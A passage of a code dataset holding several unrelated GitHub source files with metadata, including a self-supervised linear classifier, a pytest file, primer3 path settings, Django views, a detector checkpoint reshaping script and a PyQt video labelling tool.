NotImplementedError('This robust loading is not implemented')\n\n\n        else:\n            if mode == 'standard':\n                return super().load_from_checkpoint(checkpoint_path, map_location, hparams_file, strict, **kwargs)\n            \n            elif mode == 'robust':\n                raise NotADirectoryError()\n\n        \n\n\n    @staticmethod\n    def add_model_specific_args(parent_parser):\n        parser = ArgumentParser(parents=[parent_parser], add_help=False)\n\n        # model params\n        parser.add_argument('model', type=str, choices=['barlow_twins', 'simCLR', 'simsiam', 'supervised'], help='model type')\n        parser.add_argument('device', type=int, help='cuda device number, e.g. 2 means cuda:2') \n        parser.add_argument('path', type=str, help='path to model checkpoint') \n        parser.add_argument('--feature_num', type=int, help='number of output features for the unsupervised model, for resnet18 it is 512', default=512) \n        parser.add_argument('--class_num', type=int, help='number of classes' ,default=10)\n\n        parser.add_argument('--regress_latents', action='store_true', help='used for regressing 3dident')\n        parser.add_argument('--classify_spotlight', action='store_true', help='used for classifying 3dident spotlight')\n        \n        # transform params\n        parser.add_argument(\"--dataset\", type=str, default=\"cifar10\")\n\n        # training params\n        parser.add_argument('--batch_size', type=int, default=512, help='batch size for training the final linear layer')\n        parser.add_argument(\"--optimizer\", default=\"adam\", type=str, choices=['adam']) \n        parser.add_argument(\"--max_epochs\", default= 5, type=int, help=\"number of total epochs to run\")\n        parser.add_argument(\"--learning_rate\", default=1e-2, type=float, help=\"learning rate\")\n\n        #fast_dev_run\n        #This flag runs a “unit test” by running n if set to n (int) else 1 if set to True \n        # training and validation batch(es). 
The point is to detect any bugs in the training/validation loop \n # without having to wait for a full epoch to crash.\n parser.add_argument(\"--fast_dev_run\", action='store_true', default=False)\n \n\n\n return parser\n\n\n\n\nfrom pl_bolts.models.self_supervised.resnets import resnet18 as lit_ssl_resnet18\n\nclass huy_supervised(LightningModule):\n '''only load the encoder part of the supervised model to train the last layer like other SSL models'''\n def __init__(self, dataset, classifier='resnet18'):\n #super().__init__(classifier=classifier)\n super().__init__()\n if dataset == 'cifar10':\n self.model = lit_ssl_resnet18(first_conv=False, maxpool1=False, return_all_feature_maps=False)\n elif dataset == '3dident':\n self.model = lit_ssl_resnet18(first_conv=True, maxpool1=True, return_all_feature_maps=False)\n\n def forward(self, x):\n # exclude the last linear layer\n # bolt models return a list\n return self.model(x)[-1]\n\n \nfrom collections import OrderedDict\n\nclass Encoder(LightningModule):\n '''This is the model (mostly Resnet18) that has been trained using unsupervised learning.\n The point of the module is to load the encoder part of the main model and keep the model's\n requires_grad to False and in eval mode. \n '''\n\n def __init__(self, model, path, dataset):\n super().__init__()\n self.model = model\n # load pretrained unsupervised model\n # Important: in lightining the 'load_from_checkpoint' method ,unlike pytorch, returns the loaded model \n # IN LIGHTINING LOADING DOESN'T HAPPEN IN PLACE, IT IS RETURNED !! \n\n # For lightining models\n # we need to use lightinings own loading method, there is a top linear layer added durin unsupervised learning \n # and setting strict to False ignores that.(\"non_linear_evaluator.block_forward.2.weight\", \"non_linear_evaluator.block_forward.2.bias\".)\n # the forward method only applies the encoder and not the projector. so no need to call encoder.\n\n # Possible improvement For some of the models the forward calculates the unused one layer projection(s) as well which might slightly slow them down. \n\n if model == 'barlow_twins':\n # lightining\n encoder = BarlowTwins.load_from_checkpoint(path, strict=False)\n self.encoder = encoder\n # flatten output of encoder \n self.pre_process = nn.Flatten()\n \n\n elif model == 'simCLR':\n # lightining\n encoder = SimCLR.load_from_checkpoint(path, strict=False)\n self.encoder = encoder\n self.pre_process = nn.Flatten()\n\n elif model =='simsiam':\n #lightining \n encoder = SimSiam.load_from_checkpoint(path, strict=False)\n self.encoder = encoder\n self.pre_process = nn.Flatten()\n\n elif model == 'supervised':\n encoder = huy_supervised.load_from_checkpoint(path, dataset=dataset, strict=False)\n self.encoder = encoder\n self.pre_process = nn.Flatten()\n\n else:\n raise NotImplementedError('This encoder for SSL is not supported yet.')\n \n \n self.freeze()\n\n\n def forward(self,x):\n encoder_result = self.encoder(x)\n features = self.pre_process(encoder_result)\n\n return features \n\n def setup(self, device: torch.device):\n '''makes all requires_grad of parameters False and sets the model in eval mode.'''\n self.freeze()\n\n def train(self, mode: bool):\n ''' avoid pytorch lighting auto set trian mode. keep it in eval. '''\n return super().train(False)\n\n def requires_grad_(self, requires_grad: bool):\n return super().requires_grad_(False)\n\n def state_dict(self, destination, prefix, keep_vars):\n ''' (probably needs to be fixed!) 
avoid pytorch lighting auto save params '''\n destination = OrderedDict()\n destination._metadata = OrderedDict()\n return destination", "repo_name": "kfarivar/Masters_thesis", "sub_path": "models/SSL_linear_classifier.py", "file_name": "SSL_linear_classifier.py", "file_ext": "py", "file_size_in_byte": 15157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pytorch_lightning.LightningModule", "line_number": 22, "usage_type": "name"}, {"api_name": "torchmetrics.Accuracy", "line_number": 46, "usage_type": "call"}, {"api_name": "torchmetrics.Accuracy", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 85, "usage_type": "name"}, {"api_name": "huy_Supervised_models_training_CIFAR10.module.Causal3DidentModel.spotlight_label_from_latent", "line_number": 99, "usage_type": "call"}, {"api_name": "huy_Supervised_models_training_CIFAR10.module.Causal3DidentModel", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.max", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 162, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 189, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 208, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 216, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 217, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 240, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 276, "usage_type": "name"}, {"api_name": "pl_bolts.models.self_supervised.resnets.resnet18", "line_number": 282, "usage_type": "call"}, {"api_name": "pl_bolts.models.self_supervised.resnets.resnet18", "line_number": 284, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 294, "usage_type": "name"}, {"api_name": "barlow_twins_yao_training.barlowtwins_module.BarlowTwins.load_from_checkpoint", "line_number": 316, "usage_type": "call"}, {"api_name": "barlow_twins_yao_training.barlowtwins_module.BarlowTwins", "line_number": 316, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 319, "usage_type": "name"}, {"api_name": "bolt_self_supervised_training.simclr.simclr_module.SimCLR.load_from_checkpoint", "line_number": 324, "usage_type": "call"}, {"api_name": "bolt_self_supervised_training.simclr.simclr_module.SimCLR", "line_number": 324, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 326, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 326, "usage_type": "name"}, {"api_name": 
"bolt_self_supervised_training.simsiam.simsiam_module.SimSiam.load_from_checkpoint", "line_number": 330, "usage_type": "call"}, {"api_name": "bolt_self_supervised_training.simsiam.simsiam_module.SimSiam", "line_number": 330, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 332, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 332, "usage_type": "name"}, {"api_name": "torch.nn.Flatten", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 352, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 365, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 366, "usage_type": "call"}]} +{"seq_id": "7459006461", "text": "import pytest\nimport pony\n\ntest_case_files = (\n\t('input.txt', 'output.txt'),\n\t('C-small-practice.in', 'C-small-practice.out'),\n\t('C-large-practice.in', 'C-large-practice.out'),\n\t)\n\ndef ingest_google_test_case_output(fpath):\n\twith open(fpath) as input:\n\t\t\n\t\tanswers = []\n\t\tcase_nr = 1\n\t\tfor line in input.readlines():\n\t\t\tif 'Case' not in line:\n\t\t\t\tcontinue\n\t\t\ta = line.split(':')[1]\n\t\t\ta = a.split()\n\t\t\ta = tuple(map(float, a))\n\t\t\tanswers.append(a)\n\treturn answers\n\t\ntc = []\nfor i, o in test_case_files:\n\t_tc = pony.ingest_google_test_cases(i)\n\tanswers = ingest_google_test_case_output(o)\n\tassert(len(_tc) == len(answers))\n\tfor x in range(len(_tc)):\n\t\t_tc[x]['answers'] = answers[x]\n\ttc.extend(_tc)\n\t\nimport pprint; pprint.pprint(tc)\n\t\n@pytest.mark.parametrize('tc', tc)\ndef test_fastest_routes(tc):\n\troute_lookup = pony.solve_fastest_routes(tc)\n\tanswers = [route_lookup[src-1][dst-1] for src, dst in tc['queries']]\t\t\n\tfor x in range(len(answers)):\n\t\tassert pytest.approx(answers[x], abs=1e-6, rel=1e-6) == tc['answers'][x]\n\t#assert answers == pytest.approx(tc['answers'])", "repo_name": "thewopr/pony", "sub_path": "test_pony.py", "file_name": "test_pony.py", "file_ext": "py", "file_size_in_byte": 1071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pony.ingest_google_test_cases", "line_number": 26, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 33, "usage_type": "call"}, {"api_name": "pony.solve_fastest_routes", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 40, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "18259695342", "text": "\"\"\"Set and assert required app directories.\"\"\"\n\nimport os\nfrom pathlib import Path\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nPRIMER3_PATH = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'src',\n 'primer3_core'\n)\nPRIMER3_CONFIG_PATH = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'src',\n 'primer3_config'\n)\nPRIMER3_INPUT_DIR = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'input_files'\n)\nPRIMER3_OUTPUT_DIR = os.path.join(\n BASE_DIR,\n 'design',\n 'primer3',\n 'output_files'\n)\nPROBE_SEQUENCE_PATH = os.path.join(\n BASE_DIR,\n 'design',\n 'probes',\n 'roche_upl_sequences.json'\n)\nPATHS = [\n ('PRIMER3_PATH', PRIMER3_PATH),\n ('PRIMER3_INPUT_DIR', PRIMER3_INPUT_DIR),\n ('PRIMER3_OUTPUT_DIR', PRIMER3_OUTPUT_DIR),\n ('PROBE_SEQUENCE_PATH', 
PROBE_SEQUENCE_PATH),\n]\n\nfor DIR in (PRIMER3_INPUT_DIR, PRIMER3_OUTPUT_DIR):\n if not os.path.exists(DIR):\n try:\n os.mkdir(DIR)\n except Exception:\n raise FileNotFoundError(\n 'Failed to create primer3 directory at '\n + DIR\n )\n\nfor name, path in PATHS:\n assert os.path.exists(path), (\n f\"Path not found at settings.{name}:\"\n + f\" { path }\"\n )\n", "repo_name": "neoformit/primerdesign", "sub_path": "primerdesign/project_paths.py", "file_name": "project_paths.py", "file_ext": "py", "file_size_in_byte": 1267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "40435431258", "text": "import json\n\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.utils.safestring import mark_safe\n\nfrom .models import Fruit, Wallet, ChatMessage, TaskTime\nfrom .forms import LoginForm\nfrom .tasks import parserJoke\n\n\ndef login_user(request):\n if request.user.is_authenticated:\n return redirect('room')\n\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n username = User.objects.filter(email=cd['email']).first()\n if username is None:\n return redirect('login')\n\n user = authenticate(username=username, password=cd['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('room')\n else:\n return redirect('login')\n else:\n form = LoginForm()\n return render(request, 'admin_panel/login.html', {'form': form})\n\n\ndef logout_user(request):\n logout(request)\n return redirect('login')\n\n\ndef index(request):\n return render(request, 'admin_panel/index.html')\n\n\ndef warehouse(request):\n fruits = Fruit.objects.all()\n room_name = 'warehouse'\n\n parserJoke.delay()\n message_list = ChatMessage.objects.all()[:40]\n messages = []\n for obj in message_list:\n messages.insert(0, obj)\n\n data = {\n 'object_list': fruits,\n 'wallet': Wallet.objects.get(pk=1),\n 'room_name_json': mark_safe(json.dumps(room_name)),\n 'messages': messages\n }\n return render(request, 'admin_panel/warehouse.html', data)\n\n\ndef ajax_select_log(request):\n logs = TaskTime.objects.all()\n return render(request, 'admin_panel/ajax/select_log.html', {'logs': logs})", "repo_name": "Rur1k/FruitCompany", "sub_path": 
"admin_panel/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 15, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 21, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Fruit.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Fruit.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Fruit", "line_number": 47, "usage_type": "name"}, {"api_name": "tasks.parserJoke.delay", "line_number": 50, "usage_type": "call"}, {"api_name": "tasks.parserJoke", "line_number": 50, "usage_type": "name"}, {"api_name": "models.ChatMessage.objects.all", "line_number": 51, "usage_type": "call"}, {"api_name": "models.ChatMessage.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.ChatMessage", "line_number": 51, "usage_type": "name"}, {"api_name": "models.Wallet.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Wallet.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Wallet", "line_number": 58, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 59, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "models.TaskTime.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.TaskTime.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.TaskTime", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "38882526651", "text": "import argparse\nimport os\n\nimport torch\nfrom mmcv.runner.utils import set_random_seed\n\n# VOC config\nNEU_TAR_SIZE = 6\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n # Paths\n parser.add_argument('--src1', type=str, help='Path to the main checkpoint')\n parser.add_argument(\n '--src2',\n type=str,\n default=None,\n help='Path to the secondary checkpoint. 
Only used when combining '\n 'fc layers of two checkpoints')\n parser.add_argument(\n '--save-dir', type=str, default=None, help='Save directory')\n parser.add_argument(\n '--method',\n choices=['combine', 'remove', 'random_init'],\n required=True,\n help='Reshape method. combine = combine bbox heads from different '\n 'checkpoints. remove = for fine-tuning on novel dataset, remove the '\n 'final layer of the base detector. random_init = randomly initialize '\n 'novel weights.')\n parser.add_argument(\n '--param-name',\n type=str,\n nargs='+',\n default=['roi_head.bbox_head.fc_cls', 'roi_head.bbox_head.fc_reg'],\n help='Target parameter names')\n parser.add_argument(\n '--tar-name',\n type=str,\n default='base_model',\n help='Name of the new checkpoint')\n parser.add_argument('--seed', type=int, default=0, help='Random seed')\n return parser.parse_args()\n\n\ndef random_init_checkpoint(param_name, is_weight, tar_size, checkpoint, args):\n \"\"\"Either remove the final layer weights for fine-tuning on novel dataset\n or append randomly initialized weights for the novel classes.\n\n Note: The base detector for LVIS contains weights for all classes, but only\n the weights corresponding to base classes are updated during base training\n (this design choice has no particular reason). Thus, the random\n initialization step is not really necessary.\n \"\"\"\n weight_name = param_name + ('.weight' if is_weight else '.bias')\n pretrained_weight = checkpoint['state_dict'][weight_name]\n prev_cls = pretrained_weight.size(0)\n if 'fc_cls' in param_name:\n prev_cls -= 1\n if is_weight:\n feat_size = pretrained_weight.size(1)\n new_weight = torch.rand((tar_size, feat_size))\n torch.nn.init.normal_(new_weight, 0, 0.01)\n else:\n new_weight = torch.zeros(tar_size)\n new_weight[:prev_cls] = pretrained_weight[:prev_cls]\n if 'fc_cls' in param_name:\n new_weight[-1] = pretrained_weight[-1] # bg class\n checkpoint['state_dict'][weight_name] = new_weight\n\n\ndef combine_checkpoints(param_name, is_weight, tar_size, checkpoint,\n checkpoint2, args):\n \"\"\"Combine base detector with novel detector.\n\n Feature extractor weights are from the base detector. 
Only the final layer\n weights are combined.\n \"\"\"\n if not is_weight and param_name + '.bias' not in checkpoint['state_dict']:\n return\n if not is_weight and param_name + '.bias' not in checkpoint2['state_dict']:\n return\n weight_name = param_name + ('.weight' if is_weight else '.bias')\n pretrained_weight = checkpoint['state_dict'][weight_name]\n prev_cls = pretrained_weight.size(0)\n if 'fc_cls' in param_name:\n prev_cls -= 1\n if is_weight:\n feat_size = pretrained_weight.size(1)\n new_weight = torch.rand((tar_size, feat_size))\n else:\n new_weight = torch.zeros(tar_size)\n new_weight[:prev_cls] = pretrained_weight[:prev_cls]\n\n checkpoint2_weight = checkpoint2['state_dict'][weight_name]\n\n if 'fc_cls' in param_name:\n new_weight[prev_cls:-1] = checkpoint2_weight[:-1]\n new_weight[-1] = pretrained_weight[-1]\n else:\n new_weight[prev_cls:] = checkpoint2_weight\n checkpoint['state_dict'][weight_name] = new_weight\n return checkpoint\n\n\ndef reset_checkpoint(checkpoint):\n if 'scheduler' in checkpoint:\n del checkpoint['scheduler']\n if 'optimizer' in checkpoint:\n del checkpoint['optimizer']\n if 'iteration' in checkpoint:\n checkpoint['iteration'] = 0\n\n\ndef main():\n args = parse_args()\n set_random_seed(args.seed)\n checkpoint = torch.load(args.src1)\n save_name = args.tar_name + f'_fine-tuning.pth'\n save_dir = args.save_dir \\\n if args.save_dir != '' else os.path.dirname(args.src1)\n save_path = os.path.join(save_dir, save_name)\n os.makedirs(save_dir, exist_ok=True)\n reset_checkpoint(checkpoint)\n\n TAR_SIZE = NEU_TAR_SIZE\n\n if args.method == 'remove':\n # Remove parameters\n for param_name in args.param_name:\n del checkpoint['state_dict'][param_name + '.weight']\n if param_name + '.bias' in checkpoint['state_dict']:\n del checkpoint['state_dict'][param_name + '.bias']\n elif args.method == 'combine':\n checkpoint2 = torch.load(args.src2)\n tar_sizes = [TAR_SIZE + 1, TAR_SIZE * 4]\n for idx, (param_name,\n tar_size) in enumerate(zip(args.param_name, tar_sizes)):\n combine_checkpoints(param_name, True, tar_size, checkpoint,\n checkpoint2, args)\n combine_checkpoints(param_name, False, tar_size, checkpoint,\n checkpoint2, args)\n elif args.method == 'random_init':\n tar_sizes = [TAR_SIZE + 1, TAR_SIZE * 4]\n for idx, (param_name,\n tar_size) in enumerate(zip(args.param_name, tar_sizes)):\n random_init_checkpoint(param_name, True, tar_size, checkpoint,\n args)\n random_init_checkpoint(param_name, False, tar_size, checkpoint,\n args)\n else:\n raise ValueError(f'not support method: {args.method}')\n\n torch.save(checkpoint, save_path)\n print('save changed checkpoint to {}'.format(save_path))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Chan-Sun/IFSDD", "sub_path": "utils/initialize_bbox_head.py", "file_name": "initialize_bbox_head.py", "file_ext": "py", "file_size_in_byte": 5880, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.init.normal_", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 91, "usage_type": "call"}, {"api_name": "mmcv.runner.utils.set_random_seed", 
"line_number": 116, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 153, "usage_type": "call"}]} +{"seq_id": "4316002332", "text": "import os\nimport pathlib\nimport re\nimport sys\nimport logging\nimport time\n\nimport numpy as np\nimport pkg_resources\nfrom PyQt5.QtCore import Qt, QTimer\nfrom PyQt5.QtGui import QIcon, QImage, QPixmap\nfrom PyQt5.QtWidgets import (\n QAction,\n QApplication,\n QDesktopWidget,\n QDialog,\n QFileDialog,\n QHBoxLayout,\n QLabel,\n QMainWindow,\n QVBoxLayout,\n QWidget,\n)\n\nimport cv2\nfrom quicklabel.config import *\nfrom quicklabel.gui import quickLabelGUI\nfrom quicklabel.predictprocess import PredictProcess, Manager, Event, FASTAI\nfrom quicklabel.imagereaderprocess import ImageReaderProcess\nfrom quicklabel.labelrecorderprocess import LabelRecorderProcess\n\nFONT = cv2.FONT_HERSHEY_SIMPLEX\n\n\nclass quickLabel(quickLabelGUI):\n \"\"\"Create the main window that stores all of the widgets necessary for the application.\"\"\"\n\n def __init__(self, parent=None):\n \"\"\"Initialize the components of the main window.\"\"\"\n super(quickLabel, self).__init__(parent)\n\n self.filename = None\n self.last_label = None\n self.batch = []\n self.image_managed_dict = None\n self.managed_dict = None\n self.image_reader_process = None\n self.prediction_process = None\n self.label_recorder_process = None\n self.current_frame_number = 0\n\n def load_file(self, filename):\n self.filename = filename\n self.status_bar.showMessage(\"Video Loaded\", 5000)\n self.last_label = None\n \n if self.image_reader_process is not None:\n self.image_reader_process.stop_event.set()\n self.image_reader_process = ImageReaderProcess(self.filename)\n self.image_reader_process.start()\n self.current_frame_number = 0\n \n frame = self.image_reader_process[0]\n self.frame = frame\n self.printed_frame = frame\n self.height, self.width, self.channel = frame.shape\n self.bytesPerLine = 3 * self.width\n self.resize(self.width, self.height)\n\n if self.label_recorder_process is not None:\n self.label_recorder_process.stop_event.set()\n self.label_recorder_process = LabelRecorderProcess(self.filename)\n self.label_recorder_process.start()\n\n if self.prediction_process is not None:\n self.prediction_process.stop_event.set()\n\n if FASTAI:\n model_path = pkg_resources.resource_filename(\n \"models\", \"cnn1.pkl\"\n )\n\n self.prediction_process = PredictProcess(\n model_path, filename, self.image_reader_process)\n self.prediction_process.start()\n\n self.display_next_image()\n if len(self.batch) > 0:\n self.status_bar.showMessage(\n f\"{self.filename}. 
{len(self.batch)} files to go\"\n )\n else:\n self.status_bar.showMessage(f\"{self.filename}.\")\n\n def add_fast_ai_text(self, frame, label, proba):\n n = 0\n for key, val in proba.items():\n color = (100, 255, 100) if key == label else (255, 255, 255)\n cv2.putText(\n frame,\n \"{:10s}\".format(key),\n (10, self.height - 200 + n * 30),\n FONT,\n 1,\n color,\n 2,\n cv2.LINE_AA,\n )\n cv2.putText(\n frame,\n \": {:.2f}\".format(val),\n (150, self.height - 200 + n * 30),\n FONT,\n 1,\n color,\n 2,\n cv2.LINE_AA,\n )\n n += 1\n\n return frame\n\n def display_next_image(self):\n # Capture frame-by-frame\n frame = self.image_reader_process[self.current_frame_number]\n self.frame = np.copy(frame)\n if frame is None:\n return False\n\n if (\n FASTAI\n and self.current_frame_number in self.prediction_process.managed_dict.keys()\n ):\n label, proba = self.prediction_process.managed_dict[\n self.current_frame_number\n ]\n self.add_fast_ai_text(frame, label, proba)\n\n cv2.putText(\n frame,\n self.last_label,\n (10, self.height - 10),\n FONT,\n 4,\n (255, 255, 255),\n 3,\n cv2.LINE_AA,\n )\n cv2.putText(\n frame,\n str(self.current_frame_number) + \"/\" + str(len(self.image_reader_process)),\n (self.width - 250, self.height - 10),\n FONT,\n 1,\n (255, 255, 255),\n 2,\n cv2.LINE_AA,\n )\n\n\n\n self.printed_frame = frame\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n qImg = QImage(\n frame.data, self.width, self.height, self.bytesPerLine, QImage.Format_RGB888\n )\n pixmap = QPixmap.fromImage(qImg)\n self.label.setPixmap(pixmap)\n self.current_frame_number += 1\n\n return True\n\n\n def predict_on_video(self, filename):\n self.status_bar.showMessage(\"Predicting Only\")\n self.load_file(filename)\n fourcc = cv2.VideoWriter_fourcc(*'DIVX')\n self.out = cv2.VideoWriter('output.avi',fourcc, 24.0, (self.width, self.height)) \n self.i = 0\n self.predict_next_timer()\n\n def predict_next_timer(self):\n if self.i+1 in self.prediction_process.managed_dict.keys() or self.prediction_process.finished:\n if self.display_next_image():\n self.out.write(self.printed_frame)\n logging.debug(\"Writing\")\n self.i += 1\n QTimer.singleShot(10, self.predict_next_timer)\n else:\n self.out.release()\n self.status_bar.showMessage(\"Done!\")\n else:\n logging.debug('Waiting for image {} to be processed'.format(self.i))\n QTimer.singleShot(1000, self.predict_next_timer)\n\n\n\n def record_label_to_file(self):\n \"\"\"Open a QFileDialog to allow the user to open a file into the application.\"\"\"\n filename, accepted = QFileDialog.getOpenFileName(self, \"Open File\")\n if accepted:\n self.write_labels_to_file(filename)\n\n def write_labels_to_file(self, filename):\n path = pathlib.Path(filename)\n path.parent.joinpath(\"label\").mkdir(exist_ok=True)\n path = path.parent.joinpath(\"label\") / (path.stem + \".txt\")\n\n with open(path, \"w\") as f:\n f.write(\"Frame, Label\\n\")\n labels = []\n for file in path.parent.glob(path.stem + \"*.jpeg\"):\n labels.append(\n re.search(r\"_frame_(\\d*)_label_(.*)\\.jpeg\", str(file)).groups()\n )\n labels[-1] = (int(labels[-1][0]), labels[-1][1])\n labels = sorted(labels, key=lambda tup: tup[0])\n f.writelines([str(x) + \",\" + y + \"\\n\" for x, y in labels])\n\n def keyPressEvent(self, e):\n if self.filename is not None:\n label = None\n if e.key() == Qt.Key_Backspace:\n self.current_frame_number -= 2\n self.current_frame_number = max(0, self.current_frame_number)\n self.last_label = None\n self.display_next_image()\n return\n\n if e.key() == Qt.Key_F:\n label = \"Fight\"\n if 
